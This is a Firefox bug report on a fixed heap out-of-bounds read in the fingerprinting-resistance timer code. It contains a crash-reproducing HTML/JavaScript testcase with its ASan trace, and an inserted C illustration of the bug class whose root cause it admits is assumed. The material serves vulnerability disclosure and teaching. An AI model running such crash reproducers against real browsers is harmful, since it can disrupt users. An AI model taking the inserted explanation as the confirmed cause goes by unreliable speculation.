Bug 1442984 - heap out of bounds read in mozilla::nsRFPService::RandomMidpoint
Status: RESOLVED FIXED (closed)
Opened 6 years ago, closed 6 years ago
Categories: Core :: DOM: Core & HTML, defect
Target milestone: mozilla60

Tracking | Status
---|---
firefox-esr52 | unaffected
firefox58 | unaffected
firefox59 | unaffected
firefox60 | fixed

People: Reporter: nils, Assigned: tjr
Keywords: csectype-bounds, sec-low
Attachments: 3 files
The following testcase crashes the latest ASAN build of Firefox 60.0a1 () when loaded from an HTTP server.

crash.html:

<script>
function start() {
  o25 = document.createElementNS('http://www.w3.org/1999/xhtml', 'audio');
  document.documentElement.appendChild(o25);
  // first iframe, appended to the top document
  o53 = document.createElementNS('http://www.w3.org/1999/xhtml', 'iframe');
  o53.src = 'doesnt_exist.svg';
  window.top.document.body.appendChild(o53);
  o25.parentNode.insertBefore(o25.previousSibling, o25.nextSibling);
  // second iframe, also appended to the top document
  o76 = document.createElementNS('http://www.w3.org/1999/xhtml', 'iframe');
  o76.src = 'doesnt_exist.svg';
  window.top.document.body.appendChild(o76);
  // move the first iframe (o53) into the second frame's document
  o127 = window.top.frames[1];
  o128 = o127.document;
  o217 = o128.createElementNS('http://www.w3.org/1999/xhtml', 'li');
  o217.appendChild(o53);
}
</script>
<body onload="start()"></body>

ASAN output:

=================================================================
==31598==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x606000248654 at pc 0x7f3ff16ac72f bp 0x7ffe4e31b070 sp 0x7ffe4e31b068
READ of size 4 at 0x606000248654 thread T0 (Web Content)
    #0 0x7f3ff16ac72e in mozilla::nsRFPService::RandomMidpoint(long long, long long, long long*, unsigned char*) /builds/worker/workspace/build/src/toolkit/components/resistfingerprinting/nsRFPService.cpp:416:41
    #1 0x7f3ff16ad7da in mozilla::nsRFPService::ReduceTimePrecisionImpl(double, mozilla::nsRFPService::TimeScale, double, mozilla::TimerPrecisionType) /builds/worker/workspace/build/src/toolkit/components/resistfingerprinting/nsRFPService.cpp:489:9
    #2 0x7f3fed13023f in mozilla::dom::PerformanceResourceTiming::StartTime() const /builds/worker/workspace/build/src/dom/performance/PerformanceResourceTiming.cpp:51:18
    #3 0x7f3fed11cf99 in LessThan /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/PerformanceEntry.h:115:42
    #4 0x7f3fed11cf99 in operator()<RefPtr<mozilla::dom::PerformanceEntry> > /builds/worker/workspace/build/src/obj-firefox/dist/include/nsTArray.h:803
    #5 0x7f3fed11cf99 in BinarySearchIf<nsTArray_Impl<RefPtr<mozilla::dom::PerformanceEntry>, nsTArrayInfallibleAllocator>, detail::ItemComparatorFirstElementGT<mozilla::dom::PerformanceEntry *&, mozilla::dom::PerformanceEntryComparator> > /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/BinarySearch.h:80
    #6 0x7f3fed11cf99 in IndexOfFirstElementGt<mozilla::dom::PerformanceEntry *&, mozilla::dom::PerformanceEntryComparator> /builds/worker/workspace/build/src/obj-firefox/dist/include/nsTArray.h:1538
    #7 0x7f3fed11cf99 in RefPtr<mozilla::dom::PerformanceEntry>* nsTArray_Impl<RefPtr<mozilla::dom::PerformanceEntry>, nsTArrayInfallibleAllocator>::InsertElementSorted<mozilla::dom::PerformanceEntry*&, mozilla::dom::PerformanceEntryComparator, nsTArrayInfallibleAllocator>(mozilla::dom::PerformanceEntry*&, mozilla::dom::PerformanceEntryComparator const&) /builds/worker/workspace/build/src/obj-firefox/dist/include/nsTArray.h:1557
    #8 0x7f3fed121f20 in InsertResourceEntry /builds/worker/workspace/build/src/dom/performance/Performance.cpp:411:20
    #9 0x7f3fed121f20 in mozilla::dom::PerformanceMainThread::AddEntry(nsIHttpChannel*, nsITimedChannel*) /builds/worker/workspace/build/src/dom/performance/PerformanceMainThread.cpp:138
    #10 0x7f3fe644f3b9 in mozilla::net::HttpChannelChild::DoPreOnStopRequest(nsresult) /builds/worker/workspace/build/src/netwerk/protocol/http/HttpChannelChild.cpp:1222:27
    #11 0x7f3fe6459b37 in mozilla::net::HttpChannelChild::OnStopRequest(nsresult const&, mozilla::net::ResourceTimingStruct const&, mozilla::net::nsHttpHeaderArray const&) /builds/worker/workspace/build/src/netwerk/protocol/http/HttpChannelChild.cpp:1160:3
    #12 0x7f3fe6668d00 in mozilla::net::ChannelEventQueue::FlushQueue() /builds/worker/workspace/build/src/netwerk/ipc/ChannelEventQueue.cpp:93:12
    #13 0x7f3fe66732fe in MaybeFlushQueue /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/net/ChannelEventQueue.h:329:5
    #14 0x7f3fe66732fe in CompleteResume /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/net/ChannelEventQueue.h:306
    #15 0x7f3fe66732fe in mozilla::net::ChannelEventQueue::ResumeInternal()::CompleteResumeRunnable::Run() /builds/worker/workspace/build/src/netwerk/ipc/ChannelEventQueue.cpp:161
    #16 0x7f3fe59bc4a0 in mozilla::SchedulerGroup::Runnable::Run() /builds/worker/workspace/build/src/xpcom/threads/SchedulerGroup.cpp:413:25
    #17 0x7f3fe59e4a84 in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1040:14
    #18 0x7f3fe5a00a40 in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:517:10
    #19 0x7f3fe68be05a in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/worker/workspace/build/src/ipc/glue/MessagePump.cpp:97:21
    #20 0x7f3fe68115a9 in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:326:10
    #21 0x7f3fe68115a9 in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:319
    #22 0x7f3fe68115a9 in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:299
    #23 0x7f3fed43f08a in nsBaseAppShell::Run() /builds/worker/workspace/build/src/widget/nsBaseAppShell.cpp:157:27
    #24 0x7f3ff18d29fb in XRE_RunAppShell() /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:892:22
    #25 0x7f3fe68115a9 in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:326:10
    #26 0x7f3fe68115a9 in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:319
    #27 0x7f3fe68115a9 in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:299
    #28 0x7f3ff18d23da in XRE_InitChildProcess(int, char**, XREChildData const*) /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:718:34
    #29 0x4f1875 in content_process_main /builds/worker/workspace/build/src/browser/app/../../ipc/contentproc/plugin-container.cpp:50:30
    #30 0x4f1875 in main /builds/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:280
    #31 0x7f4004eaa82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
    #32 0x420f48 in _start (/fuzzer3/firefox/firefox+0x420f48)

0x606000248654 is located 12 bytes to the left of 64-byte region [0x606000248660,0x6060002486a0)
allocated by thread T0 (Web Content) here:
    #0 0x4c1c93 in malloc /builds/worker/workspace/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:88:3
    #1 0x7f3fe5815281 in Alloc /builds/worker/workspace/build/src/xpcom/string/nsSubstring.cpp:257:22
    #2 0x7f3fe5815281 in nsTSubstring<char>::MutatePrep(unsigned int, char**, mozilla::detail::StringDataFlags*) /builds/worker/workspace/build/src/xpcom/string/nsTSubstring.cpp:166
    #3 0x7f3fe582768b in nsTSubstring<char>::ReplacePrepInternal(unsigned int, unsigned int, unsigned int, unsigned int) /builds/worker/workspace/build/src/xpcom/string/nsTSubstring.cpp:229:8
    #4 0x7f3fe5823ff8 in nsTSubstring<char>::Assign(char const*, unsigned int, std::nothrow_t const&) /builds/worker/workspace/build/src/xpcom/string/nsTSubstring.cpp:390:8
    #5 0x7f3fe5811217 in nsTSubstring<char>::Assign(char const*, unsigned int) /builds/worker/workspace/build/src/xpcom/string/nsTSubstring.cpp:366:8
    #6 0x7f3ff12c2a16 in nsCryptoHash::Finish(bool, nsTSubstring<char>&) /builds/worker/workspace/build/src/security/manager/ssl/nsCryptoHash.cpp:190:11
    #7 0x7f3ff16abf41 in mozilla::nsRFPService::RandomMidpoint(long long, long long, long long*, unsigned char*) /builds/worker/workspace/build/src/toolkit/components/resistfingerprinting/nsRFPService.cpp:405:19
    #8 0x7f3ff16ad7da in mozilla::nsRFPService::ReduceTimePrecisionImpl(double, mozilla::nsRFPService::TimeScale, double, mozilla::TimerPrecisionType) /builds/worker/workspace/build/src/toolkit/components/resistfingerprinting/nsRFPService.cpp:489:9
    #9 0x7f3fed133a2e in mozilla::dom::PerformanceTimingData::PerformanceTimingData(nsITimedChannel*, nsIHttpChannel*, double) /builds/worker/workspace/build/src/dom/performance/PerformanceTiming.cpp:116:15
    #10 0x7f3fed1227f9 in mozilla::dom::PerformanceTimingData::Create(nsITimedChannel*, nsIHttpChannel*, double, nsTSubstring<char16_t>&, nsTSubstring<char16_t>&) /builds/worker/workspace/build/src/dom/performance/PerformanceTiming.cpp:72:14
    #11 0x7f3fed121dd2 in mozilla::dom::PerformanceMainThread::AddEntry(nsIHttpChannel*, nsITimedChannel*) /builds/worker/workspace/build/src/dom/performance/PerformanceMainThread.cpp:125:5
    #12 0x7f3fe644f3b9 in mozilla::net::HttpChannelChild::DoPreOnStopRequest(nsresult) /builds/worker/workspace/build/src/netwerk/protocol/http/HttpChannelChild.cpp:1222:27
    #13 0x7f3fe6459b37 in mozilla::net::HttpChannelChild::OnStopRequest(nsresult const&, mozilla::net::ResourceTimingStruct const&, mozilla::net::nsHttpHeaderArray const&) /builds/worker/workspace/build/src/netwerk/protocol/http/HttpChannelChild.cpp:1160:3
    #14 0x7f3fe6668d00 in mozilla::net::ChannelEventQueue::FlushQueue() /builds/worker/workspace/build/src/netwerk/ipc/ChannelEventQueue.cpp:93:12
    #15 0x7f3fe66732fe in MaybeFlushQueue /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/net/ChannelEventQueue.h:329:5
    #16 0x7f3fe66732fe in CompleteResume /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/net/ChannelEventQueue.h:306
    #17 0x7f3fe66732fe in mozilla::net::ChannelEventQueue::ResumeInternal()::CompleteResumeRunnable::Run() /builds/worker/workspace/build/src/netwerk/ipc/ChannelEventQueue.cpp:161
    #18 0x7f3fe59bc4a0 in mozilla::SchedulerGroup::Runnable::Run() /builds/worker/workspace/build/src/xpcom/threads/SchedulerGroup.cpp:413:25
    #19 0x7f3fe59e4a84 in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1040:14
    #20 0x7f3fe5a00a40 in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:517:10
    #21 0x7f3fe68be05a in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/worker/workspace/build/src/ipc/glue/MessagePump.cpp:97:21
    #22 0x7f3fe68115a9 in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:326:10
    #23 0x7f3fe68115a9 in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:319
    #24 0x7f3fe68115a9 in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:299
    #25 0x7f3fed43f08a in nsBaseAppShell::Run() /builds/worker/workspace/build/src/widget/nsBaseAppShell.cpp:157:27
    #26 0x7f3ff18d29fb in XRE_RunAppShell() /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:892:22
    #27 0x7f3fe68115a9 in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:326:10
    #28 0x7f3fe68115a9 in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:319
    #29 0x7f3fe68115a9 in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:299
    #30 0x7f3ff18d23da in XRE_InitChildProcess(int, char**, XREChildData const*) /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:718:34
    #31 0x4f1875 in content_process_main /builds/worker/workspace/build/src/browser/app/../../ipc/contentproc/plugin-container.cpp:50:30
    #32 0x4f1875 in main /builds/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:280
    #33 0x7f4004eaa82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)

SUMMARY: AddressSanitizer: heap-buffer-overflow /builds/worker/workspace/build/src/toolkit/components/resistfingerprinting/nsRFPService.cpp:416:41 in mozilla::nsRFPService::RandomMidpoint(long long, long long, long long*, unsigned char*)
Shadow bytes around the buggy address:
  0x0c0c80041070: 00 00 00 00 fa fa fa fa 00 00 00 00 00 00 00 00
  0x0c0c80041080: fa fa fa fa fd fd fd fd fd fd fd fd fa fa fa fa
  0x0c0c80041090: 00 00 00 00 00 00 00 00 fa fa fa fa 00 00 00 00
  0x0c0c800410a0: 00 00 00 00 fa fa fa fa 00 00 00 00 00 00 00 00
  0x0c0c800410b0: fa fa fa fa fd fd fd fd fd fd fd fd fa fa fa fa
=>0x0c0c800410c0: 00 00 00 00 00 00 00 00 fa fa[fa]fa 00 00 00 00
  0x0c0c800410d0: 00 00 00 00 fa fa fa fa fd fd fd fd fd fd fd fd
  0x0c0c800410e0: fa fa fa fa 00 00 00 00 00 00 00 00 fa fa fa fa
  0x0c0c800410f0: 00 00 00 00 00 00 00 00 fa fa fa fa fa fa fa fa
  0x0c0c80041100: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c0c80041110: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==31598==ABORTING
Comment 3 • 6 years ago (Assignee)
I think the title was a typo?
Summary: heap-use-after-free in mozilla::nsRFPService::RandomMidpoint → heap out of bounds read in mozilla::nsRFPService::RandomMidpoint
Comment 4 • 6 years ago (Assignee)
Assignee: nobody → tom
Attachment #8956171 - Flags: review?(amarchesini)
Updated • 6 years ago
Attachment #8956171 - Flags: review?(amarchesini) → review+
Updated • 6 years ago (Assignee)
Keywords: checkin-needed
Comment 5 • 6 years ago
https://hg.mozilla.org/integration/mozilla-inbound/rev/7376ba7d44f18b85ddbe0718498626d7165e9669
Keywords: checkin-needed
Comment 7 • 6 years ago
https://hg.mozilla.org/mozilla-central/rev/7376ba7d44f1
Status: NEW → RESOLVED
Closed: 6 years ago
Resolution: --- → FIXED
Target Milestone: --- → mozilla60
Updated • 6 years ago
status-firefox58: --- → unaffected
status-firefox59: --- → unaffected
status-firefox-esr52: --- → unaffected
Updated • 6 years ago
Flags: sec-bounty?

Updated • 6 years ago
Flags: sec-bounty? → sec-bounty+
Keywords: csectype-bounds, sec-high
Comment 8 • 6 years ago
Although out of bounds, what we're reading here is a numeric value that is used in a time calculation. We may end up with incorrect time fuzziness (maybe even time going backwards? Is that double-checked later or assumed good from the array?), but it doesn't seem worse than that.
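An added illustration of the class of bug the report and comment 8 describe; this is not Mozilla's code and not the patch that closed this bug. The ASan report says a 4-byte read landed 12 bytes before a 64-byte heap buffer that nsCryptoHash::Finish had just produced, which is index -3 of a table of 4-byte values carved out of a hash. The example below shows one way signed bucket arithmetic produces such an index in C and C++ (`/` truncates toward zero and `%` keeps the dividend's sign, so a negative clamped time gives a negative slot), and the floor-division form that keeps the slot inside the buffer. That negative times are what reached RandomMidpoint here is my assumption drawn from the trace, not something this bug page states. The names `random_midpoint`, `slot_index_vuln`, `slot_index_safe`, the 16-slot layout, the 1000 µs resolution and the non-cryptographic stand-in hash are all hypothetical.

```c
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define HASH_BYTES 64                        /* size of the region ASan reported */
#define SLOT_BYTES 4                         /* the trace shows a READ of size 4 */
#define SLOTS      (HASH_BYTES / SLOT_BYTES) /* 16 four-byte midpoint slots per hash */

/* Stand-in for a keyed hash. Assumption for the example only: deterministic and
 * NOT cryptographic (xorshift64), so the block runs offline. */
static void fake_keyed_hash(uint64_t secret, int64_t block, uint8_t out[HASH_BYTES]) {
    uint64_t x = secret ^ ((uint64_t)block * 0x9E3779B97F4A7C15ULL) ^ 0xD1B54A32D192ED03ULL;
    for (int i = 0; i < HASH_BYTES; i++) {
        x ^= x << 13; x ^= x >> 7; x ^= x << 17;
        out[i] = (uint8_t)(x >> 56);
    }
}

/* Floor division: rounds toward negative infinity for negative dividends. */
static int64_t floor_div(int64_t a, int64_t b) {
    int64_t q = a / b;
    if ((a % b != 0) && ((a < 0) != (b < 0))) q--;
    return q;
}

/* Vulnerable slot selection: truncating division, and '%' keeps the dividend's
 * sign, so a negative clamped time yields a negative slot (index -3 for -3000 us). */
int64_t slot_index_vuln(int64_t clamped_usec, int64_t resolution_usec, int64_t *block) {
    int64_t bucket = clamped_usec / resolution_usec;
    *block = bucket / SLOTS;
    return bucket % SLOTS;
}

/* Hardened slot selection: floor division keeps bucket, block and slot consistent
 * and the slot always lands in [0, SLOTS). */
int64_t slot_index_safe(int64_t clamped_usec, int64_t resolution_usec, int64_t *block) {
    int64_t bucket = floor_div(clamped_usec, resolution_usec);
    *block = floor_div(bucket, SLOTS);
    return bucket - *block * SLOTS;
}

/* Looks up the per-bucket random midpoint. Returns 0 and writes *midpoint_out on
 * success, or -1 when the computed byte offset leaves the hash buffer. The bounds
 * check is exactly what the vulnerable path lacks; here it stands in for ASan so
 * the example never reads out of bounds itself. *byte_offset always receives the
 * offset that would have been read. */
int random_midpoint(int64_t clamped_usec, int64_t resolution_usec, uint64_t secret,
                    bool hardened, int64_t *byte_offset, uint32_t *midpoint_out) {
    if (resolution_usec <= 0) return -1;
    int64_t block;
    int64_t slot = hardened ? slot_index_safe(clamped_usec, resolution_usec, &block)
                            : slot_index_vuln(clamped_usec, resolution_usec, &block);
    int64_t off = slot * SLOT_BYTES;
    if (byte_offset) *byte_offset = off;
    if (off < 0 || off + SLOT_BYTES > HASH_BYTES) return -1;

    uint8_t hash[HASH_BYTES];
    fake_keyed_hash(secret, block, hash);   /* one hash covers SLOTS consecutive buckets */
    uint32_t raw;
    memcpy(&raw, hash + off, SLOT_BYTES);
    *midpoint_out = raw % (uint32_t)resolution_usec;  /* midpoint within the bucket */
    return 0;
}

int main(void) {
    int64_t off; uint32_t mp;
    /* -3000 us at 1000 us resolution: bucket -3, slot -3, offset -12, the same
     * "12 bytes to the left of 64-byte region" the ASan report shows. */
    int rc = random_midpoint(-3000, 1000, 0x5EC12E7ULL, false, &off, &mp);
    printf("vulnerable: rc=%d offset=%lld\n", rc, (long long)off);
    rc = random_midpoint(-3000, 1000, 0x5EC12E7ULL, true, &off, &mp);
    printf("hardened:   rc=%d offset=%lld midpoint=%u\n", rc, (long long)off, mp);
    return 0;
}
```

The hardened form also fixes a subtler issue: with truncating division, buckets -3 and 13 would both map to block 0 and could collide on one slot, whereas floor division sends bucket -3 to block -1, slot 13, so every bucket keeps its own midpoint. Whatever the real root cause, the practitioner's check is the same: any index derived from signed time arithmetic needs a range check before it touches a hash-derived buffer.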
Updated • 6 years ago
Group: core-security → core-security-release

Updated • 6 years ago
Group: core-security-release

Updated • 5 years ago
Component: DOM → DOM: Core & HTML